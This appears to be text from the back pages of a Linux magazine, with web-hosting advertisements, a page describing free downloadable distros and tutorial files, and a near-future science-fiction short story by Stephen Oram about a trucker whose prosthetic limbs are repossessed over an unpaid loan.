‘Knowledgeable and
excellent service’ and we
serve agencies, designers,
developers and small
businesses across the UK.
ElasticHosts offers simple, flexible and
cost-effective cloud services with high
performance, availability and scalability
for businesses worldwide. Its team
of engineers provide excellent support
around the clock over the phone, email
and ticketing system.
0800 051 7126
HostPapa is an award-winning web hosting
service and a leader in green hosting. It
offers one of the most fully featured hosting
packages on the market, along with 24/7
customer support, learning resources, as
well as outstanding reliability.
• Website builder
• Budget prices
• Unlimited databases
Linux hosting is a great solution for
home users, business users and web
designers looking for cost-effective
and powerful hosting. Whether you
are building a single-page portfolio,
or you are running a database-driven
ecommerce website, there is a Linux
hosting solution for you.
• Student hosting deals
• Site designer
• Domain names
• Cloud servers on any OS
• Linux OS containers
• World-class 24/7 support
Small business host
01642 424 237
Fast, reliable hosting
hosting: | +49 (0)9831 5050
Hetzner Online is a professional
web hosting provider and
experienced data centre
operator. Since 1997 the
company has provided private
and business clients with
high-performance hosting
products, as well as the
necessary infrastructure
for the efficient operation of
websites. A combination of
stable technology, attractive
pricing and flexible support
and services has enabled
Hetzner Online to continuously
strengthen its market
position both nationally
and internationally.
• Dedicated and shared hosting
• Colocation racks
• Internet domains and
SSL certificates
• Storage boxes
01904 890 890
Founded in 2002, Bytemark are “the UK
experts in cloud & dedicated hosting”.
Their manifesto includes in-house
expertise, transparent pricing, free
software support, keeping promises
made by support staff and top-quality
hosting hardware at fair prices.
• Managed hosting
• UK cloud hosting
• Linux hosting
Get your free resources
Download the best distros, essential FOSS and all
our tutorial project files from your FileSilo account
Every time you
see this symbol
in the magazine,
there is free
online content
that's waiting
to be unlocked
on FileSilo.
• Secure and safe
online access,
from anywhere
• Free access for
every reader, print
and digital
• Download only
the files you want,
when you want
• All your gifts,
from all your
issues, all in
one place
Go to and follow the
instructions on screen to create an account with our
secure FileSilo system. When your issue arrives or you
download your digital edition, log into your account and
unlock individual issues by answering a simple question
based on the pages of the magazine for instant access to
the extras. Simple!
You can access FileSilo on any computer, tablet or
smartphone device using any popular browser. However,
we recommend that you use a computer to download
content, as you may not be able to download files to other
devices. If you have any problems with accessing content
on FileSilo, take a look at the FAQs online or email our
team at
for digital
readers too!
Read on your tablet,
download on your
Log in to
Subscribe and get instant access
Get access to our entire library of resources with a money-saving subscription to the magazine – subscribe today!
This month find...
In the FileSilo you will find the latest
version of the impressive Manjaro Linux
Xfce Edition 17.0.5, Parrot Security 3.8 and
Tiny Core Linux 8.1.1.
We’ve packed in a lot of tutorial code
this month, but we’ve still managed to
squeeze in all the Python code editors –
Eric, PyCharm Community Edition, PyDev
and Thonny – that were in the group test.
You’ll find all the resources needed for
Python/Minecraft, the Enviro pHAT ghost
detector, the Java game and the OVA file
for the pen-testing challenge!
& save!
See all the details on
how to subscribe on
page 32
Short story
Stephen Oram
Loans for limbs
Christopher’s neck was bruised where they’d
held him down while forcibly removing his
arms and legs. He’d fought them hard, but it
had been pointless; here he was, dumped by
the side of the road in an old, damp car seat, helpless
and homeless.
Tears were rolling down his face and he could do
nothing about them.
How could it have come to this? Less than a year
ago he’d taken an affordable loan from a company that
owned massive driverless trucks. He’d replaced his
arms and legs with prosthetics to become a highly paid
and highly sought-after new-breed trucker with enough
strength to load and unload the huge cargos.
Now look at him. Useless. Slumped on a dirty seat in
the gutter with the small begging bowl the bailiffs had
graciously left in front of him.
A group of people approached and his hopes rose. As
they got close he called out. ‘Please, help me.’
One of the women strolled across and stood over him.
‘What happened?’
‘Couldn’t keep up the payments,’ he said. ‘Will you
help?’ He jutted his chin towards the bowl.
Her husband joined her. ‘You didn’t think about this
when you put the rest of us out of work, did you?’
‘No. It has to be said. I didn’t care for his type then and
I most certainly don’t care for them now.’ He spun the
seat around with the tip of his foot and left Christopher
facing the wall. ‘C’mon, let’s get out of here.’
So, it had come to this. At first it’d been great –
the wages were high and the loan repayments were
comparatively low. The envy of former co-workers was
sweet and the job was a doddle.
He’d spent days on end sitting in his cab
as it drove itself from one end of the country
to the other. At random intervals the truck
would require a button to be pressed to
prove he was alert, but his right arm was
configured to send a small jolt to his brain to
prompt him. And, his left arm would deliver hits
of amphetamine to keep him awake whenever he
squeezed his thumb and fourth finger together.
It was easy.
Then it began. The trucks were constantly upgraded
with ever more sophisticated systems that required
upgrade after upgrade to his limbs. He’d increased
the loan to buy the upgrades, but it hadn’t been long
before he’d fallen behind with the payments.
Eating Robots
Taken from the new
book Eating Robots
by Stephen Oram:
near-future science-fiction
exploring the
collision of utopian
dreams and twisted
realities as humanity
and technology
become ever
more intertwined.
Sometimes funny
and often unsettling,
these 30 sci-fi shorts
will stay with you long
after you’ve turned
the final page.
He stared at the wall,
wishing he could punch it.
A stray dog with a human skull
in its mouth stood nearby, watching.
‘Good boy,’ he said, hoping he hadn’t betrayed his fear.
The dog dropped the skull and snarled. He snarled back,
tried to rock himself off the seat but failed and felt a
surge of the toxic mix of anger and hopelessness.
‘Get out of it,’ shouted a woman from behind him. He
tensed, expecting more abuse as a stone hit the ground
just in front of the dog. ‘Hi,’ she said over his shoulder.
‘Piss off,’ he shouted.
‘We can help.’
‘Go away.’
She knelt down, dropping a cheap prosthetic
leg next to him. ‘Honestly, we’re here to help you.
What happened?’
‘I couldn’t keep up the payments so they repossessed
my car, my house and eventually my limbs. Oh, and then
they dumped me here. Satisfied?’
‘Come with us. We can fit you up with these,’ she said,
tapping the leg.
‘I told you. I’ve zero cash. Absolutely zero. Nothing.’
Two men lifted the seat with Christopher still in it and
strolled towards a white van parked on the other side of
the street.
‘Oi! What do you think you’re doing?’ he shouted.
She talked as she walked alongside. ‘We’re a charity.
We rescue the victims of these disgusting corporations.
It’s what we do.’
‘Yeah? Forgive me if I don’t believe you.’
As they lifted him into the back of the van, he
recognised the arms and legs on the floor.
‘Hey, they’re mine,’ he shouted.
‘Shhh,’ she said. ‘I know. They’re unique, so once
repossessed they have no commercial value. They throw
them away and at night we sneak in and steal them back.’
He lifted his head to look her in the eyes.
She laughed. ‘Then we find the owner and reunite
them. Neat, eh?’
He smiled as she wiped the tears from his face.
YOUR FREE DISC | Ubuntu goes GNOME | Machine learning